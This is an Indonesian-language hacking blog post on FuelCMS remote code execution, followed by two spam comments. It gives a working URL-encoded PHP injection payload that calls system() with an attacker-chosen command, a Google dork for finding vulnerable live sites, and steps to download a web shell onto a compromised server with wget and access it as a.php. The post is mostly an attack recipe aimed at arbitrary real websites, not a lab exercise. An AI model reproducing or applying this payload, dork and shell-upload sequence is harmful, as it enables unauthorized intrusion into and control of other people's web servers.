FuelCMS Remote Code Execution



- Ref : https://www.exploit-db.com/exploits/47138
- Payload : /fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27COMMAD%27%29%2b%27
- Dork : intext:"FUEL CMS is developed with love by Daylight Studio"
- ngedork dolo gaes :v
- anggap saja w dah dpt 1 site vuln -v
- simak ea
- masukib payload
- http://site.com/PAYLOAD INGAT COMMAND DI PAYLOAD GANTI MISAL  ( ls -la )
- Tara keluar file ma dir listing :v up shell???
Wget url.com/shell.txt -O a.php
Aksesnya di sitr.com/a.php

-RINTOD
maaf kurang jelas :v di hp ribet anying :v

2 Responses to "FuelCMS Remote Code Execution"

  1. Going to graduate school was a positive decision for me. I enjoyed the coursework, the presentations, the fellow students, and the professors. And since my company reimbursed 100% of the tuition, the only cost that I had to pay on my own was for books and supplies. Otherwise, I received a free master’s degree. All that I had to invest was my time. whole house water filter

    ReplyDelete
  2. I have read your article, it is very informative and helpful for me.I admire the valuable information you offer in your articles. Thanks for posting it.. Visit website

    ReplyDelete

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel